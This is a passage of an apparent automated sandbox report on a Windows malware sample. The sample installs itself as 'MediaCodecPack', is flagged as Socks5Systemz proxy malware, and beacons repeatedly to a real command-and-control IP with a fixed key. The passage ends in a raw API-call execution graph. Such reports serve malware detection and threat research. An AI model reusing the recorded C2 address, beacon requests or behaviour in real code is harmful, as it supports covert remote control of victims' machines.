                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.10  49916        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:13 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:14 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:14 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:14 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.10  49923        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:16 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:17 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:17 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:17 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.10  49930        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:19 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:19 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:19 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:19 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.10  49936        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:21 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:22 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:22 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:22 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.10  49943        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:23 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:24 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:24 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:24 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.10  49950        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:26 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:26 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:26 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:26 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.10  49956        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:28 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:29 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:28 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:29 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.10  49963        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:30 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:31 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:31 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:31 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.10  49969        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:33 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:34 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:33 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:34 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID:20
Source IP:192.168.2.10
Source Port:49975
Destination IP:188.119.66.185
Destination Port:443
PID:7404
Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:51:35 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:51:36 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:51:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:51:36 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID:21
Source IP:192.168.2.10
Source Port:49981
Destination IP:188.119.66.185
Destination Port:443
PID:7404
Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:51:38 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:51:38 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:51:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:51:38 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID:22
Source IP:192.168.2.10
Source Port:49989
Destination IP:188.119.66.185
Destination Port:443
PID:7404
Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:51:40 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:51:41 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:51:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:51:41 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID:23
Source IP:192.168.2.10
Source Port:49995
Destination IP:188.119.66.185
Destination Port:443
PID:7404
Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:51:43 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:51:43 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:51:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:51:43 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID:24
Source IP:192.168.2.10
Source Port:50001
Destination IP:188.119.66.185
Destination Port:443
PID:7404
Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:51:45 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:51:46 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:51:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:51:46 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID:25
Source IP:192.168.2.10
Source Port:50004
Destination IP:188.119.66.185
Destination Port:443
PID:7404
Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:51:48 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:51:48 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:51:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:51:48 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID:26
Source IP:192.168.2.10
Source Port:50005
Destination IP:188.119.66.185
Destination Port:443
PID:7404
Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:51:50 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:51:51 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:51:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:51:51 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250



                                                                              Target ID:0
                                                                              Start time:07:49:46
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\Desktop\newwork.exe.1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\newwork.exe.1.exe"
                                                                              Imagebase:0x400000
                                                                              File size:3'314'669 bytes
                                                                              MD5 hash:27B4FA67C0810BC212077971A00854EA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:1
                                                                              Start time:07:49:46
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp" /SL5="$2047E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe"
                                                                              Imagebase:0x400000
                                                                              File size:706'560 bytes
                                                                              MD5 hash:ED6A19AD054AD0172201AF725324781B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2575850575.0000000005A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:07:49:47
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                                                                              Imagebase:0x400000
                                                                              File size:3'193'465 bytes
                                                                              MD5 hash:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1336954414.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2575281871.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:false


                                                                                Execution Graph

                                                                                Execution Coverage:21.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:2.4%
                                                                                Total number of Nodes:1520
                                                                                Total number of Limit Nodes:22
[Execution graph data: call-graph node listing (node id, code address, Win32 API calls reached) and node->node edges, rendered as an interactive graph on the original page]
API calls 6107 406d87 6105->6107 6106->6101 6108 406a34 21 API calls 6106->6108 6109 40322c 4 API calls 6107->6109 6108->6101 6110 406d91 6109->6110 6111 4031b8 4 API calls 6110->6111 6112 406dab 6111->6112 6112->5976 6114 409244 6113->6114 6115 406638 19 API calls 6114->6115 6116 40925d 6115->6116 6117 40322c 4 API calls 6116->6117 6122 409268 6117->6122 6119 406978 20 API calls 6119->6122 6120 4033b4 18 API calls 6120->6122 6121 408dd8 18 API calls 6121->6122 6122->6119 6122->6120 6122->6121 6123 405890 18 API calls 6122->6123 6125 4092e4 6122->6125 6192 4091b0 6122->6192 6200 409034 6122->6200 6123->6122 6126 40322c 4 API calls 6125->6126 6127 4092ef 6126->6127 6128 4031b8 4 API calls 6127->6128 6129 409309 6128->6129 6130 403198 4 API calls 6129->6130 6131 409311 6130->6131 6131->5976 6133 4034f0 18 API calls 6132->6133 6135 406a6b 6133->6135 6134 406a82 GetEnvironmentVariableA 6134->6135 6136 406a8e 6134->6136 6135->6134 6139 406a95 6135->6139 6154 406dec 6135->6154 6137 403198 4 API calls 6136->6137 6137->6139 6139->6095 6149 406a34 6139->6149 6141 403414 6140->6141 6142 4068ab GetFullPathNameA 6141->6142 6143 4068b7 6142->6143 6144 4068ce 6142->6144 6143->6144 6145 4068bf 6143->6145 6146 40322c 4 API calls 6144->6146 6147 403278 18 API calls 6145->6147 6148 4068cc 6146->6148 6147->6148 6148->6105 6158 4069dc 6149->6158 6153 406ce9 6152->6153 6153->6097 6155 406dfa 6154->6155 6156 4034f0 18 API calls 6155->6156 6157 406e08 6156->6157 6157->6135 6165 406978 6158->6165 6160 4069fe 6161 406a06 GetFileAttributesA 6160->6161 6162 406a1b 6161->6162 6163 403198 4 API calls 6162->6163 6164 406a23 6163->6164 6164->6095 6175 406744 6165->6175 6167 4069b0 6170 4069c6 6167->6170 6171 4069bb 6167->6171 6169 406989 6169->6167 6182 406970 CharPrevA 6169->6182 6183 403454 6170->6183 6172 40322c 4 API calls 6171->6172 6174 4069c4 6172->6174 6174->6160 6179 406755 6175->6179 6176 4067b9 6177 406680 IsDBCSLeadByte 6176->6177 6178 4067b4 6176->6178 6177->6178 6178->6169 
6179->6176 6181 406773 6179->6181 6181->6178 6190 406680 IsDBCSLeadByte 6181->6190 6182->6169 6184 403486 6183->6184 6185 403459 6183->6185 6186 403198 4 API calls 6184->6186 6185->6184 6188 40346d 6185->6188 6187 40347c 6186->6187 6187->6174 6189 403278 18 API calls 6188->6189 6189->6187 6191 406694 6190->6191 6191->6181 6193 403198 4 API calls 6192->6193 6195 4091d1 6193->6195 6197 4091fe 6195->6197 6209 4032a8 6195->6209 6212 403494 6195->6212 6198 403198 4 API calls 6197->6198 6199 409213 6198->6199 6199->6122 6201 408f70 2 API calls 6200->6201 6202 40904a 6201->6202 6203 40904e 6202->6203 6216 406a48 6202->6216 6203->6122 6206 409081 6207 408fac Wow64RevertWow64FsRedirection 6206->6207 6208 409089 6207->6208 6208->6122 6210 403278 18 API calls 6209->6210 6211 4032b5 6210->6211 6211->6195 6213 403498 6212->6213 6215 4034c3 6212->6215 6214 4034f0 18 API calls 6213->6214 6214->6215 6215->6195 6217 4069dc 21 API calls 6216->6217 6218 406a52 GetLastError 6217->6218 6218->6206 6220 406744 IsDBCSLeadByte 6219->6220 6222 406835 6220->6222 6221 40687f 6221->5988 6222->6221 6223 406680 IsDBCSLeadByte 6222->6223 6223->6222 6225 4068f3 6224->6225 6226 406820 IsDBCSLeadByte 6225->6226 6228 4068fe 6226->6228 6227 4066ea 6227->5993 6227->5994 6228->6227 6229 406680 IsDBCSLeadByte 6228->6229 6229->6228 6231 406957 6230->6231 6232 40695b 6230->6232 6231->6007 6235 406970 CharPrevA 6232->6235 6234 40696c 6234->6007 6235->6234 6810 408f30 6813 408dfc 6810->6813 6814 408e05 6813->6814 6815 403198 4 API calls 6814->6815 6816 408e13 6814->6816 6815->6814 6817 403932 6818 403924 6817->6818 6819 40374c VariantClear 6818->6819 6820 40392c 6819->6820 5380 4075c4 SetFilePointer 5381 4075f7 5380->5381 5382 4075e7 GetLastError 5380->5382 5382->5381 5383 4075f0 5382->5383 5385 40748c GetLastError 5383->5385 5388 4073ec 5385->5388 5389 407284 19 API calls 5388->5389 5390 407414 5389->5390 5391 407434 5390->5391 5392 405194 33 API calls 5390->5392 5393 405890 18 API calls 5391->5393 
5392->5391 5394 407443 5393->5394 5395 403198 4 API calls 5394->5395 5396 407460 5395->5396 5396->5381 6411 4076c8 WriteFile 6412 4076e8 6411->6412 6413 4076ef 6411->6413 6414 40748c 35 API calls 6412->6414 6415 407700 6413->6415 6416 4073ec 34 API calls 6413->6416 6414->6413 6416->6415 6417 402ccc 6420 402cfe 6417->6420 6421 402cdd 6417->6421 6418 402d88 RtlUnwind 6419 403154 4 API calls 6418->6419 6419->6420 6421->6418 6421->6420 6422 402b28 RaiseException 6421->6422 6423 402d7f 6422->6423 6423->6418 6829 403fcd 6830 403f07 4 API calls 6829->6830 6831 403fd6 6830->6831 6832 403e9c 4 API calls 6831->6832 6833 403fe2 6832->6833 6430 4024d0 6431 4024e4 6430->6431 6432 4024e9 6430->6432 6435 401918 4 API calls 6431->6435 6433 402518 6432->6433 6434 40250e RtlEnterCriticalSection 6432->6434 6437 4024ed 6432->6437 6445 402300 6433->6445 6434->6433 6435->6432 6438 402525 6441 402581 6438->6441 6442 402577 RtlLeaveCriticalSection 6438->6442 6440 401fd4 14 API calls 6443 402531 6440->6443 6442->6441 6443->6438 6444 40215c 9 API calls 6443->6444 6444->6438 6446 402314 6445->6446 6448 4023b8 6446->6448 6450 402335 6446->6450 6447 402344 6447->6438 6447->6440 6448->6447 6449 401d80 9 API calls 6448->6449 6453 402455 6448->6453 6455 401e84 6448->6455 6449->6448 6450->6447 6452 401b74 9 API calls 6450->6452 6452->6447 6453->6447 6454 401d00 9 API calls 6453->6454 6454->6447 6460 401768 6455->6460 6457 401e99 6458 401ea6 6457->6458 6459 401dcc 9 API calls 6457->6459 6458->6448 6459->6458 6461 401787 6460->6461 6462 40183b 6461->6462 6463 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6461->6463 6465 40132c LocalAlloc 6461->6465 6466 401821 6461->6466 6468 4017d6 6461->6468 6464 4015c4 VirtualAlloc 6462->6464 6469 4017e7 6462->6469 6463->6461 6464->6469 6465->6461 6467 40150c VirtualFree 6466->6467 6467->6469 6470 40150c VirtualFree 6468->6470 6469->6457 6470->6469 6471 4028d2 6472 4028da 6471->6472 6473 403554 4 API calls 6472->6473 6474 4028ef 6472->6474 6473->6472 
